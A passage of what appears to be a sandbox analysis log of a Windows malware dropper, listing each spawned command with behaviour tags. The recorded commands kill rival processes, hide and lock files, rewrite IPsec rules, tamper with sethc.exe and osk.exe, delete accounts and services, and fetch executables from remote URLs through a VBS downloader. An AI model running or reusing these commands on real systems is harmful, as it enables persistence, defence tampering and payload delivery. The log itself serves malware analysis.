C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiappsrv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5176
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:3580
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5252
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4032
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:3992
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:3548
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:3516
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5404
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppRsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4828
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='tasksche.exe' and ExecutablePath='C:\\Windows\\tasksche.exe'" call Terminate3⤵
- Kills process with WMI
PID:5952
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5372
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4996
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe" /d everyone3⤵PID:5004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5012
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" /d everyone3⤵PID:5024
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30318_64\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5044
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\clr_optimization_v4.0.30318_64\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
PID:3548
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵PID:4952
-
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
PID:5152
-
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
PID:4836
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵PID:5516
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵PID:3944
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵PID:900
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵PID:1796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵PID:1252
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵PID:4684
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵PID:4648
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵PID:1492
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵PID:5564
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵PID:5200
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵PID:4028
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵PID:5544
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵PID:3592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "NETControlUpdate" /f3⤵PID:3524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "WinHostStartForMachine" /f3⤵PID:4776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftUpdate" /f3⤵PID:4564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "AdobeFlashPlayer" /f3⤵PID:4592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:3908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Font upgrade service" /f3⤵PID:3368
-
-
C:\Windows\SysWOW64\sc.exesc stop FastUserSwitchingCompatibility3⤵
- Launches sc.exe
PID:3384
-
-
C:\Windows\SysWOW64\sc.exesc delete FastUserSwitchingCompatibility3⤵PID:3408
-
-
C:\Windows\SysWOW64\sc.exesc stop PSEXESVC3⤵
- Launches sc.exe
PID:3420
-
-
C:\Windows\SysWOW64\sc.exesc delete PSEXESVC3⤵
- Launches sc.exe
PID:3432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundll32.exe3⤵
- Kills process with taskkill
PID:3444
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SpeechsTracing3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4048
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate3⤵
- Kills process with WMI
PID:5508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing\spoolsv.exe /d everyone3⤵PID:3940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4644
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing /t /d everyone3⤵PID:900
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SecureBootThemes\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:4624
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\sysprepthemes\\microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:1896
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:3484
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SecureBootThemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5080
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SecureBootThemes /p everyone:n /d system3⤵PID:4672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\wmassrv.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:3500
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\HalPluginsServices.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:3532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4896
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\wmassrv.dll /d everyone3⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2832
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\HalPluginsServices.dll /d everyone3⤵PID:1260
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\sysprepthemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4556
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\sysprepthemes /d everyone3⤵PID:4548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe /im *.tmp /im *.jpg /im *.cc33⤵
- Kills process with taskkill
PID:4516
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\program files (x86)\exfg"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1432
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\program files (x86)\exfg" /d everyone3⤵PID:5588
-
-
C:\Windows\SysWOW64\sc.exesc stop "Amxend Msbtvsqv Ble"3⤵
- Launches sc.exe
PID:5376
-
-
C:\Windows\SysWOW64\sc.exesc delete "Amxend Msbtvsqv Ble"3⤵PID:3352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3936
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update" /g users:r3⤵PID:4572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\*.cc3 /a3⤵
- Modifies file permissions
PID:5520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4088
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\*.cc3" /t /p everyone:n3⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3372
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.cc3" /t /p everyone:n3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3900
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.tmp" /t /p everyone:n3⤵PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3836
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.jpg" /t /p everyone:n3⤵PID:4088
-
-
C:\Windows\SysWOW64\sc.exesc stop bddlsvc3⤵PID:4000
-
-
C:\Windows\SysWOW64\sc.exesc delete bddlsvc3⤵
- Launches sc.exe
PID:1128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im crawler.exe /im Crowdtest.exe /im CrowdtestWatcher.exe /im Kerrigan.exe /im adb.exe /im phantomjs.exe3⤵
- Kills process with taskkill
PID:1704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
PID:3460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /end /tn "Securitycript"3⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn Securitycript /f3⤵PID:3908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn GooglePinginConfigs /f3⤵PID:3468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn RavTask /f3⤵PID:3396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Setting.exe3⤵
- Kills process with taskkill
PID:5192
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1228
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /d everyone3⤵PID:1552
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /p everyone:n /d system3⤵PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\temp1.bat2⤵PID:2492
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1900
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵PID:764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1712
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2808
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2856
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵PID:2652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:324
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵PID:688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2632
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵PID:2448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\osk.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5144
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /g Administrators:f3⤵PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Users:r3⤵PID:5924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5964
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Administrators:r3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d SERVICE3⤵PID:6004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6044
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d "network service"3⤵PID:6052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g system:r3⤵PID:6092
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f3⤵PID:6124
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f3⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlser.exe" /f3⤵PID:5148
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f3⤵PID:5892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\smss.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5920
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\smss.exe /g everyone:f3⤵PID:5948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
PID:5968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5984
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g system:f3⤵PID:6000
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBb6b3acba5104f41c9b364680f28de9f9?method=download&inline=true&shareKey=c5aa6f51dffffee47d0ee728d894f348" C:\Windows\Temp\0AHM.exe3⤵PID:6080
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEB413662f5cc07627e58c48fe17d4d29d0?method=download&inline=true&shareKey=eb9998a97429406e7ea9f4bf2bf14549" C:\Windows\Temp\0osk.exe3⤵
- Blocklisted process makes network request
PID:4976
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.13⤵
- Runs ping.exe
PID:1724
-
-
C:\Windows\SysWOW64\sc.exesc stop HostManger3⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\SysWOW64\sc.exesc delete HostManger3⤵
- Launches sc.exe
PID:5804
-
-
C:\Windows\SysWOW64\sc.exesc stop Hostserver3⤵PID:5132
-
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver3⤵
- Launches sc.exe
PID:5136
-
-
C:\Windows\SysWOW64\sc.exesc stop ServicesMain3⤵
- Launches sc.exe
PID:4852
-
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\fonts /a3⤵
- Modifies file permissions
PID:3880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\rundllhost.exe /a3⤵
- Modifies file permissions
PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\dlllhost.exe /a3⤵
- Modifies file permissions
PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\conhost.exe /a3⤵
- Modifies file permissions
PID:3916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\svchost.exe /a3⤵
- Modifies file permissions
PID:5768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\csrss.exe /a3⤵
- Modifies file permissions
PID:4464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\KvMonXP.exe /a3⤵
- Modifies file permissions
PID:3076
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\KvMonXP.exe3⤵
- Views/modifies file attributes
PID:1404
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\rundllhost.exe3⤵
- Views/modifies file attributes
PID:1892
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\dlllhost.exe3⤵
- Views/modifies file attributes
PID:1928
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\conhost.exe3⤵
- Views/modifies file attributes
PID:1492
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\svchost.exe3⤵
- Views/modifies file attributes
PID:1920
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\csrss.exe3⤵
- Views/modifies file attributes
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1640
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\rundllhost.exe" /g everyone:f3⤵PID:3792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4700
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\dlllhost.exe" /g everyone:f3⤵PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4640
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\conhost.exe" /g everyone:f3⤵PID:4636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\svchost.exe" /g everyone:f3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\csrss.exe" /g everyone:f3⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5948
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\KvMonXP.exe" /g everyone:f3⤵PID:3108
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5556
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5184
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
PID:3976
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate3⤵
- Kills process with WMI
PID:4948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundllhost.exe3⤵
- Kills process with taskkill
PID:5244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dlllhost.exe3⤵
- Kills process with taskkill
PID:4028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im KvMonXP.exe3⤵
- Kills process with taskkill
PID:4584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dllhots.exe3⤵
- Kills process with taskkill
PID:3360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d11hots.exe3⤵
- Kills process with taskkill
PID:5920
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvMonXP.exe" /f3⤵PID:3092
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais3⤵PID:4588
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais3⤵
- Launches sc.exe
PID:4584
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims3⤵PID:3376
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims3⤵
- Launches sc.exe
PID:3388
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotSais3⤵
- Launches sc.exe
PID:3428
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotSais3⤵
- Launches sc.exe
PID:3440
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotSaims3⤵
- Launches sc.exe
PID:3456
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotSaims3⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceSaims3⤵
- Launches sc.exe
PID:3464
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSaims3⤵PID:4648
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceSais3⤵PID:988
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSais3⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMais3⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMais3⤵
- Launches sc.exe
PID:4700
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMaims3⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims3⤵PID:3856
-
-
C:\Windows\SysWOW64\sc.exesc stop NetPipeAtcivator3⤵
- Launches sc.exe
PID:1044
-
-
C:\Windows\SysWOW64\sc.exesc delete NetPipeAtcivator3⤵
- Launches sc.exe
PID:4644
-
-
C:\Windows\SysWOW64\sc.exesc stop FormManger3⤵
- Launches sc.exe
PID:4668
-
-
C:\Windows\SysWOW64\sc.exesc delete FormManger3⤵PID:4672
-
-
C:\Windows\SysWOW64\sc.exesc stop Famserver3⤵
- Launches sc.exe
PID:1796
-
-
C:\Windows\SysWOW64\sc.exesc delete Famserver3⤵
- Launches sc.exe
PID:3504
-
-
C:\Windows\SysWOW64\sc.exesc delete Samsorver3⤵PID:4748
-
-
C:\Windows\SysWOW64\sc.exesc stop Samsorver3⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsarver3⤵
- Launches sc.exe
PID:1384
-
-
C:\Windows\SysWOW64\sc.exesc stop Microsarver3⤵
- Launches sc.exe
PID:3852
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:1896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:3988
-
-
-
C:\Windows\SysWOW64\net.exenet user admin$ /del3⤵PID:5840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user admin$ /del4⤵PID:5856
-
-
-
C:\Windows\SysWOW64\net.exenet user aliyun /del3⤵PID:1756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user aliyun /del4⤵PID:1628
-
-
-
C:\Windows\SysWOW64\net.exenet user lcy /del3⤵PID:4568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user lcy /del4⤵PID:4536
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundll32.exe3⤵
- Kills process with taskkill
PID:4508
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBba2227a56359db179ebf9a924bc233d3?method=download&inline=true&shareKey=89273cb26401400b293be41d8c5cffa5" C:\Windows\Temp\smss.exe3⤵
- Blocklisted process makes network request
PID:1272
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- Runs ping.exe
PID:2300
-
-
C:\Windows\SysWOW64\sc.exesc start Microsarver3⤵PID:2956
-
-
